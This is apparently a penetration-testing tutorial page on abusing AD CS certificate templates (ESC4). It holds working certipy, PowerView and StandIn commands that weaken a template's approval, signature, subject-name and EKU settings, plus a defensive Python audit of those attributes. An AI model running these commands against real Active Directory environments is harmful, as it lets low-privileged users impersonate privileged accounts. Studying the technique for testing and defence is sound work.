ESC4
Performing ESC4 allows an attacker to introduce a misconfiguration into a template that is not vulnerable to begin with, by abusing a certificate template with overly permissive ACLs; the rights that are critical for this abuse are:
Owner - Full Control
FullControl - Full Control
WriteOwner - Modify the owner to grant Full Control
WriteDacl - Modify the access control list to grant Full Control
WriteProperty - Edit any property
In order to modify a template we need to change these values:
Grant Enrollment rights for the vulnerable template
Disable the PEND_ALL_REQUESTS flag in mspki-enrollment-flag to deactivate Manager Approval
Set the mspki-ra-signature attribute to 0 to disable the Authorized Signature requirement
Enable the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to allow requesting users to specify another privileged account name as a SAN
Set the mspki-certificate-application-policy to a certificate purpose for authentication:
Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
Any Purpose (OID: 2.5.29.37.0)
No Extended Key Usage (EKU)
These are the steps we can take to abuse a certificate template vulnerable to ESC4: first we make the changes to the template we have ACLs on and save the old configuration so that we can revert the changes at a later time
certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old
now the ESC4 certificate template should be vulnerable to all ESC techniques from 1 to 4 (included)
certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout
<SNIP>
ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions
From this point on we can abuse any of the 3 misconfigurations (either ESC1, ESC2 or ESC3).
To revert the changes made to the certificate template we can use the JSON file generated by the previous certipy template command
certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json
The certipy template command automates the process of setting up the misconfigurations completely, but it's also possible to do it manually from a Windows host using the following PowerView commands.
Add Certificate Enrollment Permissions to the Domain Users group
Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose
Disable the manager approval requirement by clearing the PEND_ALL_REQUESTS flag: set mspki-enrollment-flag to 0x00000009 (0x00000001 + 0x00000008, i.e. only CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS and CT_FLAG_PUBLISH_TO_DS), which leaves PEND_ALL_REQUESTS unset
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose
Disable the Authorized Signature requirement by setting the mspki-ra-signature attribute to 0
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose
Enable SAN specification, making the template vulnerable to ESC1, by setting the ENROLLEE_SUPPLIES_SUBJECT flag in mspki-certificate-name-flag to 1
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose
Add the Client Authentication EKU to both pkiextendedkeyusage and mspki-certificate-application-policy
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
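The conditions that certipy find -vulnerable reports for a template can be checked offline against the raw attribute values the steps above modify. The following Python is an added example (not part of the original page, of certipy or of PowerView): it evaluates the enrollment flags, signature requirement, name flag and policy OIDs listed earlier and reports which ESC1 preconditions a template meets, which is the check a defender auditing template changes wants to run. The flag constants follow MS-CRTD; the two sample templates are constructed data.

```python
# Added example (not certipy or PowerView code): audit the template attributes
# the steps above modify. Flag constants follow MS-CRTD; the sample templates
# are constructed data, not taken from a real directory.
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001  # msPKI-Enrollment-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002             # msPKI-Enrollment-Flag
CT_FLAG_PUBLISH_TO_DS = 0x00000008                 # msPKI-Enrollment-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001     # msPKI-Certificate-Name-Flag
# EKUs that let a certificate authenticate as the principal named in its SAN
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
REQUIRED = {"manager approval disabled", "no authorized signature required", "enrollee supplies subject (SAN)"}

def audit_template(tpl: dict) -> list:
    """ESC1 preconditions met by tpl (LDAP-style: integer flags + list of policy OIDs)."""
    findings = []
    if not tpl.get("mspki-enrollment-flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("manager approval disabled")
    if tpl.get("mspki-ra-signature", 0) == 0:
        findings.append("no authorized signature required")
    if tpl.get("mspki-certificate-name-flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject (SAN)")
    policies = tpl.get("mspki-certificate-application-policy", [])
    if not policies:  # a template with no EKU at all also permits authentication
        findings.append("no EKU (usable for authentication)")
    findings += [f"authentication EKU: {AUTH_EKUS[o]}" for o in policies if o in AUTH_EKUS]
    return findings

def is_esc1_exposed(tpl: dict, low_priv_can_enroll: bool) -> bool:
    """All three flag preconditions, an authentication-capable EKU, and low-priv enrollment."""
    f = audit_template(tpl)
    has_auth_eku = any(x.startswith(("authentication EKU", "no EKU")) for x in f)
    return low_priv_can_enroll and REQUIRED <= set(f) and has_auth_eku
# Constructed samples: the same template before and after the changes above
SAFE_TEMPLATE = {
    "mspki-enrollment-flag": 0xB,      # 0x1 + 0x2 + 0x8: approval still required
    "mspki-ra-signature": 1,
    "mspki-certificate-name-flag": 0,
    "mspki-certificate-application-policy": ["1.3.6.1.5.5.7.3.2"],
}
WEAPONISED_TEMPLATE = {
    "mspki-enrollment-flag": 9,        # 0x1 + 0x8: PEND_ALL_REQUESTS cleared
    "mspki-ra-signature": 0,
    "mspki-certificate-name-flag": 1,  # ENROLLEE_SUPPLIES_SUBJECT set
    "mspki-certificate-application-policy": ["1.3.6.1.5.5.7.3.2"],
}
```

Fed with the attribute values pulled from the Certificate Templates container, the audit flags the template only once all of the changes above have landed, so a diff of its output before and after a WriteProperty change is a direct indicator of ESC4 activity.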
We can also do the same thing with StandIn; the following are the commands used to introduce an ESC1 misconfiguration into a certificate template.
Adding ENROLLEE_SUPPLIES_SUBJECT
.\StandIn.exe --ADCS --filter SecureUpdate --ess --add
Add Certificate Enrollment Permissions to the Domain Users group
.\StandIn.exe --ADCS --filter SecureUpdate --ntaccount "DOMAIN\domain users" --enroll --add
Adding an EKU (in this case we'll use the Client Authentication EKU):
.\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add